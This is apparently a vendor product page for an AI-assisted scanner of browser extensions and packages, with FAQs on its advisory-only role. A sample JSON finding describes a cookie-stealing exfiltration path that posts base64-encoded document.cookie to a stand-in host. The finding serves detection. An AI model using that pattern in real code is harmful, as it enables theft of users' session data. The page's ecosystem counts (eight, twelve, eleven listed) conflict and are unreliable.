AI code analysis that reads and explains the source
Extuno's AI layer reads the full source of an extension or package, correlates behavior across versions, decodes lightly-obfuscated logic, and writes plain explanations of why a finding matters. It runs alongside the rule engine and the sandbox, and it never overrides their verdict.
What does the AI layer actually do?
The AI layer reads the complete source of an extension or package, not just the lines a rule already flagged. It follows data from where it is collected to where it leaves the code, ties together pieces that sit in different files, and decodes lightly-obfuscated logic such as string concatenation, hex escapes, and base64 wrappers that hide an endpoint or a payload.
For each conclusion it writes a short explanation in evidence terms: the file, the line, the behavior, and why it is dangerous. This sits next to the rule-based static analysis output so an analyst reads one consistent report instead of switching between a raw match list and free text.
How does it correlate behavior across versions?
A single version can look benign while a later update introduces the dangerous step. The AI layer compares the current source against the previous version and points out where new behavior was added: a fresh network endpoint, a new code path that reads credentials, a decode step that was not there before.
This feeds the same supply-chain signal that drives version diffing. When a clean extension is poisoned through its update channel, the AI explanation names the exact change between releases, so the escalation reads as a concrete diff rather than a score that moved.
Why is the AI layer advisory only?
The verdict is owned by the rule engine and the dynamic sandbox. The AI layer adds context and explanation, but it cannot raise a finding to a hard-block on its own. This is a deliberate design choice: a model that could flip the verdict could also create a false hard-block, and a CI gate that blocks builds on a guess is worse than no gate.
So the AI output is labeled as advisory throughout the report. It enriches what static and dynamic analysis already proved, it never replaces the evidence, and a build never fails on AI text alone.
How does it handle obfuscation?
Malicious code rarely ships in clear form. The AI layer decodes the common lightly-obfuscated patterns: characters assembled with String.fromCharCode, hex and unicode escapes, base64 blobs passed to a decoder, and string fragments concatenated to hide a domain or a command.
Once the logic is readable, the AI explains what the decoded form does and which endpoint or action it points to. Heavy or layered obfuscation is also a signal in its own right, surfaced by the rule engine; the AI layer adds the readable account of what the hidden code was trying to run.
Where does it fit in the pipeline?
A scan runs static analysis over the unpacked source, executes the extension or package in the sandbox, and runs the AI layer over the full source and the captured behavior. The three layers write into one report where every finding carries a file, a line, the reason, and the recommended action.
The full order, the inputs each layer reads, and the verdict rules are written up on the methodology page. The AI layer is the explanation and correlation step that makes the rule and sandbox output easier to act on across the eight supported ecosystems.
{
"id": "AI-CORRELATE-EXFIL-01",
"severity": "high",
"advisory": true,
"file": "src/bg.js",
"line": 212,
"summary": "Reads document.cookie, base64-encodes it, and POSTs to an endpoint assembled from string fragments. Endpoint and encode step were added in this version.",
"decoded_endpoint": "https://collector.example/upload",
"introduced_in_version": "3.4.0",
"recommended_action": "Review the new exfiltration path against the prior release before approving the update."
}Frequently asked questions
Can the AI layer block my CI build by itself?
No. The AI layer is advisory only. The pass or fail decision in a CI gate comes from the static rules and the sandbox verdict, never from AI text. This is why the AI layer cannot create a false hard-block on a guess.
Does the AI read my full source code?
Yes. It reads the complete source of the scanned extension or package, not only the lines a rule already matched. Reading everything is what lets it correlate behavior across files and explain decoded logic that a single pattern match would miss.
How is this different from the static rule engine?
The static engine runs over 1100 rules that match known patterns without running the code, including over 1000 secret detectors. The AI layer reads the same source to correlate behavior, decode obfuscation, and explain findings in plain terms. They run together and write one report.
Does it work on packages as well as extensions?
Yes. The AI layer runs across all twelve supported ecosystems: Chrome, Firefox, VS Code, JetBrains, Eclipse, Discord client mods, npm, PyPI, WordPress, Composer, and Maven. It reads source the same way whether the target is a browser extension or a developer package.
Will it flag a credential or API key in the source?
Secret detection is owned by the dedicated detectors in the static layer. The AI layer can describe how a credential is used or sent, and it correlates that usage with network behavior, but the secret finding itself carries the evidence and the recommended rotation action.